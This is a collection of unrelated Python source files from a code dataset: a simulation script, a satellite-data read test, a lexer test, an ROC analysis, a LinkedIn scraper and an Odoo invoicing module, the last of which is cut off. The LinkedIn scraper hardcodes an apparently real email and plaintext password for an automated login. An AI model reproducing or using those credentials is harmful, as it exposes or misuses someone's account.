+{"seq_id":"108620323","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec  6 13:55:33 2020\n\n@author: Freedom\n\"\"\"\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nvreme_simulacije = 302400 # duzina test seta ( 6 meseci )\nvremena_otkaza = np.load('vremena_otkaza.npy')\nvremena_popravke = np.load('vremena_popravke.npy')\npodatci1 = vremena_otkaza.reshape(-1)\npodatci2 = vremena_popravke.reshape(-1)\n\ndef gen_lambda_and_mi(podatci1,podatci2, seq_len, t):\n    matrix = np.zeros(vreme_simulacije)\n    for i in podatci1:\n        matrix[int(i)] = 1        \n    matrix1 = np.zeros(vreme_simulacije)\n    for i in podatci2:\n        matrix1[int(i)] = 1  \n    lambd = []\n    mi = []    \n    start = 0\n    end = seq_len\n    for i in range(int((len(matrix)-seq_len)/t)):\n        ls = matrix[start:end]\n        lambd.append(sum(ls))\n        ls1 = matrix1[start:end]\n        mi.append(sum(ls1))\n        start += t\n        end += t\n    lambd.append(sum(matrix[-seq_len:]))\n    mi.append(sum(matrix1[-seq_len:]))\n    return lambd, mi\n        \nseq_leng = [15*24*60, 7*24*60, 30*24*60]\ndt = [10, 30, 60]\n\nfor seq_len in seq_leng:\n    for t in dt:\n        lamb, mi =  gen_lambda_and_mi(podatci1,podatci2, int(seq_len), t)\n        mi_gen_simulacija = np.array(mi).reshape(-1, 1)\n        lamb_gen_simulacija = np.array(lamb).reshape(-1, 1)\n        sim_name_lam = 'Failure_rates_' + str(t) + 'dt_' + str(seq_len) + 'min_simulacija' + '.npy'\n        sim_name_mi = 'Repair_rates' + str(t) + 'dt' + str(seq_len) + 'min_simulacija' + '.npy'\n        np.save(sim_name_lam, lamb_gen_simulacija)\n        np.save(sim_name_mi +str(t), mi_gen_simulacija)\n        plt.plot(mi)","sub_path":"Machine_learning_simulations/1. Deterministic based prediction/Simulation_implementation/NN_classified/tf_normal_prediction_2y/tf_noram_prediction.py","file_name":"tf_noram_prediction.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"363521357","text":"\"\"\"\nThis file is part of pyS5p\n\nhttps://github.com/rmvanhees/pys5p.git\n\nPurpose\n-------\nPerform unittest on ICMio\n\nNote\n----\nPlease use the code as tutorial\n\nCopyright (c) 2017 SRON - Netherlands Institute for Space Research\n   All Rights Reserved\n\nLicense:  BSD-3-Clause\n\"\"\"\nimport sys\nimport re\n\nfrom pathlib import Path\n\ndef test_rd_icm(msm_dset=None):\n    \"\"\"\n    Perform a full read-test a ICM product using the ICMio class\n\n    \"\"\"\n    from ..get_data_dir import get_data_dir\n    from ..icm_io import ICMio\n\n    # obtain path to directory pys5p-data\n    try:\n        data_dir = get_data_dir()\n    except FileNotFoundError:\n        return\n    filelist = list(Path(data_dir, 'ICM').glob('S5P_TEST_ICM_CA_*.h5'))\n    if not filelist:\n        return\n\n    for name in sorted(filelist):\n        print(name, file=sys.stderr)\n        icm = ICMio(name)\n        print(icm)\n        print('version: ', icm.get_processor_version())\n        print('creation_time', icm.get_creation_time())\n        print('coverage_time', icm.get_coverage_time())\n        for key1 in icm.fid:\n            if not key1.startswith('BAND'):\n                continue\n            print(key1)\n            for key2 in icm.fid[key1]:\n                print('-->', key2)\n                icm.select(key2)\n                _ = icm.get_ref_time()\n                res2 = icm.get_delta_time()\n                print('\\t delta time: ', res2.shape)\n                res3 = icm.get_instrument_settings()\n                print('\\t instrument settings [{}]: '.format(res3.size),\n                      res3.shape)\n                res4 = icm.get_housekeeping_data()\n                print('\\t housekeeping data [{}]: '.format(res4.size),\n                      res4.shape)\n\n                if msm_dset is None:\n                    if key1.endswith('_RADIANCE'):\n                        geo = icm.get_geo_data(band=icm.bands[0],\n                                               geo_dset='latitude,longitude')\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'radiance_avg'\n                    elif key1.endswith('_IRRADIANCE'):\n                        geo = icm.get_geo_data(band=icm.bands[0])\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'irradiance_avg'\n                    elif key1.endswith('_ANALYSIS'):\n                        if key2 == 'ANALOG_OFFSET_SWIR':\n                            dset_name = 'analog_offset_swir_value'\n                        elif key2 == 'DPQF_MAP':\n                            dset_name = 'dpqf_map'\n                        elif key2 == 'LONG_TERM_SWIR':\n                            dset_name = 'long_term_swir_value'\n                        elif key2 == 'NOISE':\n                            dset_name = 'noise'\n                        else:\n                            dset_name = 'signal_avg'\n                    else:\n                        geo = icm.get_geo_data(band=icm.bands[0])\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'signal_avg_row'\n                else:\n                    dset_name = msm_dset\n\n                # read both bands seperated\n                for ib in icm.bands:\n                    data = icm.get_msm_data(dset_name, band=ib)\n                    print('\\t {}[{}]: {}'.format(dset_name, ib,\n                                                 data.shape))\n\n       
         # read whole channels\n                for ib in re.findall('..', icm.bands):\n                    data = icm.get_msm_data(dset_name, band=ib)\n                    print('\\t {}[{}]: {}'.format(dset_name, ib,\n                                                 data.shape))\n\n        icm.close()\n\nif __name__ == '__main__':\n    test_rd_icm()\n","sub_path":"pys5p/full_tests/test_full_icm.py","file_name":"test_full_icm.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"533669306","text":"from unittest import TestCase\n\n\nclass T(TestCase):\n    def test(self):\n        from ..name import Literal, Name\n        from ..lexer import lex,\\\n            APPEND, BRA, COLON, KET, RECURSIVE, SIMPLE\n        Name._clear()  # pylint: disable=protected-access\n        feed = r'''\n            # 0\n            +a ::==+=(*b # x\n                # y\n                -c:\n                # z\n                (/d)\n            )e\n        '''\n        a, b, c, d = map(Name, (r'+a', r'*b', r'-c', r'/d'))\n        e = Literal(r'e')\n        ex = a, COLON, SIMPLE, RECURSIVE, APPEND,\\\n            BRA, b, c, COLON, BRA, d, KET, KET, e\n        le = len(ex)\n        ac = tuple(lex(feed))\n        assert len(ac) == le\n        expected = (True,) * (le - 1) + (False,)\n        actual = tuple(self.same_side_by_side(ex, ac))\n        self.assertEqual(expected, actual)\n\n    @staticmethod\n    def same_side_by_side(ex, ac):\n        return (e is a for e, a in zip(ex, ac))\n","sub_path":"a0attic/a2017_11_21b_ez_lexer_with_name/test/tokenize.py","file_name":"tokenize.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"614540324","text":"# ---------------------------------------------------------------------------------------------------------------------\r\n# Import Statements\r\n\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport imutils\r\nimport math\r\nimport scipy.stats as stats\r\nfrom scipy.integrate import quad\r\nfrom matplotlib import pyplot\r\nfrom sklearn import metrics\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Obtains Number of Images in Directory\r\n\r\nimg_folder_pathF = \"C:/Users/david/OneDrive/Documents/PycharmProjects/Primary/Raw Data/ML_specgra_10m20_echo_norm\" \\\r\n                   \"_and_timedelay_remove_04082019/training_set/foliage\"\r\nfileNumberF = os.listdir(img_folder_pathF)\r\n\r\nimg_folder_pathH = \"C:/Users/david/OneDrive/Documents/PycharmProjects/Primary/Raw Data/ML_specgra_10m20_echo_norm\" \\\r\n                   \"_and_timedelay_remove_04082019/training_set/hole\"\r\nfileNumberH = os.listdir(img_folder_pathH)\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Variable Initializations\r\n\r\nallMeanValuesF = np.array([])\r\nallMeanValuesH = np.array([])\r\n# distance to mean sum\r\ndtmsF = 0\r\ndtmsH = 0\r\nthresholdF = 0\r\nthresholdH = 0\r\nareaHIT = [None] * 100\r\nareaFA = [None] * 100\r\nnumImagesF = len(fileNumberF)\r\nnumImagesH = len(fileNumberH)\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Mean and Standard Deviation Calculations for Foliage\r\n\r\n# FOLIAGE\r\nfor i in range(1, numImagesF + 1):\r\n    path = img_folder_pathF + \"/foliage.\" + str(i) + \".0.jpg\"\r\n\r\n    img = cv2.imread(path, 2)\r\n    rotateimg = imutils.rotate(img, 60)\r\n    newimg = cv2.resize(rotateimg, (64, 64))\r\n    newimg = cv2.normalize(newimg.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\r\n\r\n    foliagePixelValues = np.array([])\r\n\r\n    for r in range(64):\r\n        for j in range(10, 20):\r\n            pixelValue = newimg[r, j]\r\n            foliagePixelValues = np.append(foliagePixelValues, pixelValue)\r\n\r\n    sortedFPV = sorted(foliagePixelValues)\r\n\r\n    tophalfFPV = sortedFPV[len(sortedFPV) // 2:]  # cuts pixel values in half, to get top 50%\r\n    topquarterFPV = tophalfFPV[len(tophalfFPV) // 2:]  # cuts pixel values in half again, to get top 25%\r\n\r\n    # takes mean of pixel value array and then adds it to another empty array\r\n    meanPixelValueImageF = sum(topquarterFPV) / len(topquarterFPV)\r\n\r\n    allMeanValuesF = np.append(allMeanValuesF, meanPixelValueImageF)\r\n    print(\"Foliage Image #: \" + str(i) + \"/\" + str(numImagesF))\r\n\r\n# calculates mean/std for FOLIAGE\r\nmeanFoliage = sum(allMeanValuesF) / len(allMeanValuesF)\r\n\r\nfor i in range(len(allMeanValuesF)):\r\n    dtmsF = dtmsF + (allMeanValuesF[i] - meanFoliage) ** 2\r\n\r\nstdFoliage = math.sqrt(dtmsF / len(allMeanValuesF))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Mean and Standard Deviation Calculations for Hole\r\n\r\n# HOLE\r\nfor i in range(1, numImagesH + 1):\r\n    path = img_folder_pathH + \"/hole.\" + str(i) + \".0.jpg\"\r\n\r\n    img = cv2.imread(path, 2)\r\n    rotateimg = imutils.rotate(img, 60)\r\n    newimg = cv2.resize(rotateimg, (64, 64))\r\n    newimg = cv2.normalize(newimg.astype('float'), 
None, 0.0, 1.0, cv2.NORM_MINMAX)\r\n\r\n    holePixelValues = np.array([])\r\n\r\n    for r in range(64):\r\n        for j in range(10, 20):\r\n            pixelValue = newimg[r, j]\r\n            holePixelValues = np.append(holePixelValues, pixelValue)\r\n\r\n    sortedHPV = sorted(holePixelValues)\r\n\r\n    tophalfHPV = sortedHPV[len(sortedHPV) // 2:]\r\n    topquarterHPV = tophalfHPV[len(tophalfHPV) // 2:]\r\n\r\n    meanPixelValueImageH = sum(topquarterHPV) / len(topquarterHPV)\r\n\r\n    allMeanValuesH = np.append(allMeanValuesH, meanPixelValueImageH)\r\n    print(\"Hole Image #: \" + str(i) + \"/\" + str(numImagesH))\r\n\r\n# calculates mean/std for HOLE\r\nmeanHole = sum(allMeanValuesH) / len(allMeanValuesH)\r\n\r\nfor i in range(len(allMeanValuesH)):\r\n    dtmsH = dtmsH + (allMeanValuesH[i] - meanHole) ** 2\r\n\r\nstdHole = math.sqrt(dtmsH / len(allMeanValuesH))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Various Information on Foliage/Hole\r\n\r\nprint('--------------------------------------')\r\nprint('FOLIAGE')\r\nprint('Min Mean of Foliage: ' + str(round(min(allMeanValuesF), 2)))\r\nprint('Max Mean of Foliage: ' + str(round(max(allMeanValuesF), 2)))\r\nprint('The Mean of Foliage: ' + str(round(meanFoliage, 2)))\r\nprint('The STD of Foliage: ' + str(round(stdFoliage, 2)))\r\nprint('--------------------------------------')\r\nprint('HOLE')\r\nprint('Min Mean of Hole: ' + str(round(min(allMeanValuesH), 2)))\r\nprint('Max Mean of Hole: ' + str(round(max(allMeanValuesH), 2)))\r\nprint('The Mean of Hole: ' + str(round(meanHole, 2)))\r\nprint('The STD of Hole: ' + str(round(stdHole, 2)))\r\nprint('--------------------------------------')\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Normal Distribution Curve Plotting\r\n\r\nlowerBound = 0\r\nupperBound = 1\r\n\r\nx = np.linspace(lowerBound, upperBound, 10000)\r\nfoliagePlot = pyplot.plot(x, stats.norm.pdf(x, meanFoliage, stdFoliage), color='blue')\r\nholePlot = pyplot.plot(x, stats.norm.pdf(x, meanHole, stdHole), color='red')\r\npyplot.grid()\r\npyplot.show()\r\n\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Integration of Hits\r\n\r\n\r\ndef ndffoliage(x):\r\n    value = stats.norm.pdf(x, meanFoliage, stdFoliage)\r\n    return value\r\n\r\n\r\nfor i in range(0, 100):\r\n    af = 0 + thresholdF\r\n    bf = 1\r\n\r\n    res, err = quad(ndffoliage, af, bf)\r\n\r\n    areaHIT[i] = round(res, 4)\r\n    thresholdF = thresholdF + 0.01\r\n\r\n    # print('Integration between {} and {} --> '.format(af, bf), round(res, 4))\r\n    #\r\n    # ptx = np.linspace(af, bf, 10)\r\n    # pty = stats.norm.pdf(ptx, meanFoliage, stdFoliage)\r\n    #\r\n    # pyplot.fill_between(ptx, pty, color='#0b559f', alpha='1.0')\r\n    # pyplot.show()\r\n\r\n\r\n# print(\"Area Hit: \" + str(areaHIT))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Integration of False Alarms\r\n\r\n\r\ndef ndfhole(x):\r\n    value = stats.norm.pdf(x, meanHole, stdHole)\r\n    return value\r\n\r\n\r\nfor i in range(0, 100):\r\n    ah = 0 + thresholdH\r\n    bh = 1\r\n\r\n    res, err = quad(ndfhole, ah, bh)\r\n\r\n    areaFA[i] = round(res, 4)\r\n    thresholdH = thresholdH + 0.01\r\n\r\n    # print('Integration between {} and {} --> '.format(ah, bh), round(res, 4))\r\n    #\r\n    # ptx = np.linspace(ah, bh, 10)\r\n    # pty = stats.norm.pdf(ptx, meanHole, stdHole)\r\n    #\r\n    # pyplot.fill_between(ptx, pty, color='#0b559f', alpha='1.0')\r\n    # pyplot.show()\r\n\r\n# print(\"Area FA: \" + str(areaFA))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Plots the ROC Curve\r\n\r\nhitROC = list(reversed(areaHIT))\r\nfaROC = list(reversed(areaFA))\r\n\r\npyplot.plot(faROC, hitROC, color='red')\r\n\r\npyplot.grid()\r\npyplot.xlim(0.0, 1.0)\r\npyplot.ylim(0.0, 1.0)\r\n\r\npyplot.title('ROC Foliage/Hole Data', fontsize=10)\r\npyplot.xlabel('False Alarms')\r\npyplot.ylabel('Hits')\r\npyplot.show()\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Finds the AUROC\r\n\r\n# sklearn's auc(x, y) expects x = false-alarm rate and y = hit rate\r\nAUROC = metrics.auc(faROC, hitROC)\r\nif AUROC > 0.5:\r\n    print('AUROC: ' + str(round(AUROC, 4)))\r\n    print('AUROC: ' + str(round(AUROC, 2)))\r\nelse:\r\n    print('AUROC: ' + str(round(1 - AUROC, 4)))\r\n    print('AUROC: ' + str(round(1 - AUROC, 2)))\r\n","sub_path":"spectrogram_analyzation.py","file_name":"spectrogram_analyzation.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"306012749","text":"import requests\nimport csv\nimport bs4\nimport time\n# from compsim.company_name_similarity import CompanyNameSimilarity\nfrom selenium import webdriver\n\ndef linkedinLogin(driver):\n\n    URL = 'https://www.linkedin.com/uas/login'\n    driver.get('https://www.linkedin.com/uas/login')\n\n    emailid = driver.find_element_by_id(\"session_key-login\")\n    emailid.send_keys('sashadogskrpr0@gmail.com')\n    passwordid = driver.find_element_by_id(\"session_password-login\")\n    passwordid.send_keys('qywcon-sYmra4-jemwuw')\n    signin = driver.find_element_by_id(\"btn-primary\")\n    signin.click()\n\ndef linkedinBusiness(business,driver):\n    url = 'https://duckduckgo.com/?q=!ducky+' + business + ' linked-in'\n    driver.get(url)\n\n    time.sleep(5)\n\n    html = driver.page_source\n    soup = bs4.BeautifulSoup(html, \"html.parser\")\n    currentUrl = driver.current_url\n\n    try:\n        regName = soup.find(\"h1\", attrs={'dir':'ltr'}).getText().strip()\n    except Exception as e:\n        regName = str(e)\n\n    try:\n        follower = soup.find(\"span\", class_=\"org-top-card-module__followers-count \"\n                             \"org-top-card-module__dot-separated-list\").getText().strip()\n    except Exception as e:\n        follower = str(e)\n\n\n\n    return currentUrl, regName, follower\n    print(currentUrl)\n    print(regName)\n    print(follower)\n\n\ndef load_csv(business, driver):\n    searchResult = linkedinBusiness(business, driver)\n    print(searchResult)\n\n    if searchResult != None:\n        linkedInUrl = searchResult[0]\n        regName = searchResult[1]\n        follower = searchResult[2]\n\n        return linkedInUrl, regName, follower\n\nif __name__=='__main__':\n\n    ##initiate driver\n    chrome_options = webdriver.ChromeOptions()\n    chrome_options.add_argument('--disable-extensions')\n    chrome_options.add_argument('--profile-directory=Default')\n    chrome_options.add_argument(\"--incognito\")\n    chrome_options.add_argument(\"--disable-plugins-discovery\")\n    chrome_options.add_argument(\"--start-maximized\")\n    driver = webdriver.Chrome(chrome_options=chrome_options)\n    driver.delete_all_cookies()\n    driver.set_window_size(800, 800)\n    driver.set_window_position(0, 0)\n\n\n    linkedinLogin(driver)\n    result = load_csv('Marvin Engineering',driver)\n    print(result)\n    print(\"URL: \" +result[0])\n    print(\"address: \" +result[1])\n","sub_path":"LinkedIn.py","file_name":"LinkedIn.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"58082462","text":"\n# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api\nfrom odoo.tools.float_utils import float_compare\nimport datetime\nfrom math import * \n# from difodoo.addons_gesprim.difodoo_ventes.models.di_outils import di_recherche_prix_unitaire\n# from difodoo_ventes import di_outils\n# from difodoo.outils import di_outils\n\nclass AccountInvoice(models.Model):\n    _inherit = 'account.invoice'\n    \n    di_nbex = fields.Integer(\"Nombre exemplaires\",help=\"\"\"Nombre d'exemplaires d'une impression.\"\"\",default=0)\n    \n    @api.model\n    def create(self,vals):        \n        res = super(AccountInvoice, self).create(vals)        \n        for invoice in res:   \n            if invoice.di_nbex==0: \n                if invoice.partner_id:                \n                    invoice.write({'di_nbex': invoice.partner_id.di_nbex_fac})                \n        return res\n    \n    @api.multi\n    @api.onchange(\"partner_id\")\n    def di_onchange_partner(self):\n        for fac in self:\n            if fac.partner_id:\n                fac.di_nbex = fac.partner_id.di_nbex_fac\n    \n    @api.multi\n    def _invoice_line_tax_values(self):\n        # copie standard\n        self.ensure_one()\n        tax_datas = {}\n        TAX = self.env['account.tax']\n\n        for line in self.mapped('invoice_line_ids'):\n            # modif de la quantité à prendre en compte\n            di_qte_prix = 0.0\n           \n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity\n                \n            price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n            tax_lines = line.invoice_line_tax_ids.compute_all(price_unit, line.invoice_id.currency_id, di_qte_prix, line.product_id, line.invoice_id.partner_id)['taxes']\n            for tax_line in tax_lines:\n                tax_line['tag_ids'] = TAX.browse(tax_line['id']).tag_ids.ids\n            tax_datas[line.id] = tax_lines\n        return tax_datas\n   \n    \n    @api.multi\n    def get_taxes_values(self):  \n        # copie standard          \n        tax_grouped = {}\n        for line in self.invoice_line_ids:\n            if not line.account_id:\n                continue\n            # modif de la quantité à prendre en compte\n            di_qte_prix = 0.0\n           \n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity\n                                \n            price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n#             taxes = line.invoice_line_tax_ids.compute_all(price_unit, self.currency_id, line.quantity, line.product_id, self.partner_id)['taxes']\n            taxes = 
line.invoice_line_tax_ids.compute_all(price_unit, self.currency_id, di_qte_prix, line.product_id, self.partner_id)['taxes']\n            for tax in taxes:\n                val = self._prepare_tax_line_vals(line, tax)\n                key = self.env['account.tax'].browse(tax['id']).get_grouping_key(val)\n\n                if key not in tax_grouped:\n                    tax_grouped[key] = val\n                else:\n                    tax_grouped[key]['amount'] += val['amount']\n                    tax_grouped[key]['base'] += val['base']\n        return tax_grouped\n    \n    \n    def _prepare_invoice_line_from_po_line(self, line):\n        # copie standard\n        #Copie du standard pour ajouter des éléments dans data\n        if line.product_id.purchase_method == 'purchase':\n            qty = line.product_qty - line.qty_invoiced\n            di_qte_un_saisie = line.di_qte_un_saisie - line.di_qte_un_saisie_fac\n            di_poib = line.di_poib - line.di_poib_fac            \n        #ajout difodoo\n        else:\n            qty = line.qty_received - line.qty_invoiced\n            di_qte_un_saisie = line.di_qte_un_saisie_liv - line.di_qte_un_saisie_fac\n            di_poib = line.di_poib_liv - line.di_poib_fac\n        #ajout difodoo\n        if float_compare(qty, 0.0, precision_rounding=line.product_uom.rounding) <= 0:\n            qty = 0.0\n        taxes = line.taxes_id\n        invoice_line_tax_ids = line.order_id.fiscal_position_id.map_tax(taxes)\n        invoice_line = self.env['account.invoice.line']\n        data = {\n            'purchase_line_id': line.id,\n            'name': line.order_id.name+': '+line.name,\n            'origin': line.order_id.origin,\n            'uom_id': line.product_uom.id,\n            'product_id': line.product_id.id,\n            'account_id': invoice_line.with_context({'journal_id': self.journal_id.id, 'type': 'in_invoice'})._default_account(),\n            'price_unit': line.order_id.currency_id.with_context(date=self.date_invoice).compute(line.price_unit, self.currency_id, round=False),\n            'quantity': qty,\n            'discount': 0.0,\n            'account_analytic_id': line.account_analytic_id.id,\n            'analytic_tag_ids': line.analytic_tag_ids.ids,\n            'invoice_line_tax_ids': invoice_line_tax_ids.ids,\n            #Ajout des éléments difodoo\n            'di_tare':line.di_tare,  \n            'di_un_saisie':line.di_un_saisie,\n            'di_type_palette_id':line.di_type_palette_id,\n            'di_product_packaging_id':line.product_packaging,\n            'di_un_prix':line.di_un_prix,\n            'di_qte_un_saisie':di_qte_un_saisie,\n            'di_poib':di_poib\n                               \n        }\n        account = invoice_line.get_invoice_line_account('in_invoice', line.product_id, line.order_id.fiscal_position_id, self.env.user.company_id)\n        if account:\n            data['account_id'] = account.id\n        return data\n     \nclass AccountInvoiceLine(models.Model):\n    _inherit = \"account.invoice.line\"\n    \n    modifparprg = False\n     \n    di_qte_un_saisie = fields.Float(string='Quantité en unité de saisie', store=True)\n    di_un_saisie = fields.Selection([(\"PIECE\", \"Pièce\"), (\"COLIS\", \"Colis\"), (\"PALETTE\", \"Palette\"), (\"KG\", \"Kg\")], string=\"Unité de saisie\", store=True)\n    di_type_palette_id = fields.Many2one('product.packaging', string='Palette', store=True) \n    di_nb_pieces = fields.Integer(string='Nb pièces', compute=\"_compute_qte_aff\", store=True)\n    
di_nb_colis = fields.Integer(string='Nb colis' ,compute=\"_compute_qte_aff\", store=True)\n    di_nb_palette = fields.Float(string='Nb palettes' ,compute=\"_compute_qte_aff\", store=True)\n    di_poin = fields.Float(string='Poids net' ,compute=\"_compute_qte_aff\", store=True)\n    di_poib = fields.Float(string='Poids brut', store=True)\n    di_tare = fields.Float(string='Tare', store=True)#,compute=\"_compute_tare\")\n    di_product_packaging_id = fields.Many2one('product.packaging', string='Package', default=False, store=True)\n    di_un_prix      = fields.Selection([(\"PIECE\", \"Pièce\"), (\"COLIS\", \"Colis\"),(\"PALETTE\", \"Palette\"),(\"KG\",\"Kg\")], string=\"Unité de prix\",store=True)\n    di_flg_modif_uom = fields.Boolean(default=False)\n    \n    di_spe_saisissable = fields.Boolean(string='Champs spé saisissables',default=False,compute='_di_compute_spe_saisissable',store=True)\n    \n    @api.multi\n    @api.onchange('di_type_palette_id','di_product_packaging_id','di_nb_colis','di_nb_palette')\n    def _compute_tare(self):        \n        self.di_tare = (self.di_type_palette_id.di_poids * self.di_nb_palette) + (self.di_product_packaging_id.di_poids * self.di_nb_colis)\n        \n    def di_recherche_prix_unitaire(self,prixOrig, tiers, article, di_un_prix , qte, date,typecol,typepal):    \n        prixFinal = 0.0       \n        prixFinal =self.env[\"di.tarifs\"]._di_get_prix(tiers,article,di_un_prix,qte,date,typecol,typepal)\n        if prixFinal == 0.0:\n            prixFinal = prixOrig\n#             if prixOrig == 0.0:\n#                 raise Warning(\"Le prix unitaire de la ligne est à 0 !\")\n        return prixFinal \n    \n    @api.multi\n    @api.depends('product_id.di_spe_saisissable')\n    def _di_compute_spe_saisissable(self):\n        for aol in self:        \n            aol.di_spe_saisissable =aol.product_id.di_spe_saisissable\n     \n \n # n'existe plus en v12\n#     @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity',\n#         'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id', 'invoice_id.company_id',\n#         'invoice_id.date_invoice')\n#     def _compute_total_price(self):\n#         for line in self:\n#             # modif de la quantité à prendre en compte\n#             di_qte_prix = 0.0\n#             if line.di_un_prix == \"PIECE\":\n#                 di_qte_prix = line.di_nb_pieces\n#             elif line.di_un_prix == \"COLIS\":\n#                 di_qte_prix = line.di_nb_colis\n#             elif line.di_un_prix == \"PALETTE\":\n#                 di_qte_prix = line.di_nb_palette\n#             elif line.di_un_prix == \"KG\":\n#                 di_qte_prix = line.di_poin\n#             elif line.di_un_prix == False or line.di_un_prix == '':\n#                 di_qte_prix = line.quantity\n#             price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n#             taxes = line.invoice_line_tax_ids.compute_all(price, line.invoice_id.currency_id, di_qte_prix, product=line.product_id, partner=line.invoice_id.partner_id)\n#             line.price_total = taxes['total_included']\n\n    \n    \n    @api.one # SC je garde api.one car c'est une copie du standard\n    @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity',\n        'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id', 'invoice_id.company_id',\n        'invoice_id.date_invoice', 'invoice_id.date','di_qte_un_saisie','di_nb_pieces','di_nb_colis','di_nb_palette','di_poin','di_poib','di_tare','di_un_prix')\n    
def _compute_price(self):\n        # copie standard\n        currency = self.invoice_id and self.invoice_id.currency_id or None\n        price = self.price_unit * (1 - (self.discount or 0.0) / 100.0)\n        taxes = False\n        \n        # modif de la quantité à prendre en compte \n        di_qte_prix = 0.0        \n        if self.di_un_prix == \"PIECE\":\n            di_qte_prix = self.di_nb_pieces\n        elif self.di_un_prix == \"COLIS\":\n            di_qte_prix = self.di_nb_colis\n        elif self.di_un_prix == \"PALETTE\":\n            di_qte_prix = self.di_nb_palette\n        elif self.di_un_prix == \"KG\":\n            di_qte_prix = self.di_poin\n        elif self.di_un_prix == False or self.di_un_prix == '':\n            di_qte_prix = self.quantity\n            \n        if self.invoice_line_tax_ids:\n            taxes = self.invoice_line_tax_ids.compute_all(price, currency, di_qte_prix, product=self.product_id, partner=self.invoice_id.partner_id)        \n        self.price_subtotal = price_subtotal_signed = taxes['total_excluded'] if taxes else di_qte_prix * price\n        self.price_total = taxes['total_included'] if taxes else self.price_subtotal\n        if self.invoice_id.currency_id and self.invoice_id.currency_id != self.invoice_id.company_id.currency_id:\n            currency = self.invoice_id.currency_id\n            date = self.invoice_id._get_currency_rate_date()\n            price_subtotal_signed = currency._convert(price_subtotal_signed, self.invoice_id.company_id.currency_id, self.company_id or self.env.user.company_id, date or fields.Date.today())\n        sign = self.invoice_id.type in ['in_refund', 'out_refund'] and -1 or 1\n        self.price_subtotal_signed = price_subtotal_signed * sign\n\n        \n    @api.multi\n    @api.onchange('product_id','invoice_id.partner_id','invoice_id.date','di_un_prix','di_qte_un_saisie','di_nb_pieces','di_nb_colis','di_nb_palette','di_poin','di_poib','di_tare','quantity')\n    def _di_changer_prix(self):\n        for line in self:\n            di_qte_prix = 0.0\n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity             \n            if line.product_id.id != False and line.di_un_prix:       \n                line.price_unit = self.di_recherche_prix_unitaire(line.price_unit,line.invoice_id.partner_id,line.product_id,line.di_un_prix,di_qte_prix,line.invoice_id.date,line.product_packaging,line.di_type_palette_id)            \n     \n    @api.multi            \n    @api.onchange('product_id')\n    def _di_charger_valeur_par_defaut(self):\n        if self.ensure_one():\n            if self.partner_id and self.product_id:\n                ref = self.env['di.ref.art.tiers'].search([('di_partner_id','=',self.partner_id.id),('di_product_id','=',self.product_id.id)],limit=1)\n            else:\n                ref = False\n            if ref:\n                self.di_un_saisie = ref.di_un_saisie\n                self.di_type_palette_id = ref.di_type_palette_id\n                self.product_packaging = ref.di_type_colis_id    \n                self.di_un_prix = ref.di_un_prix    \n               
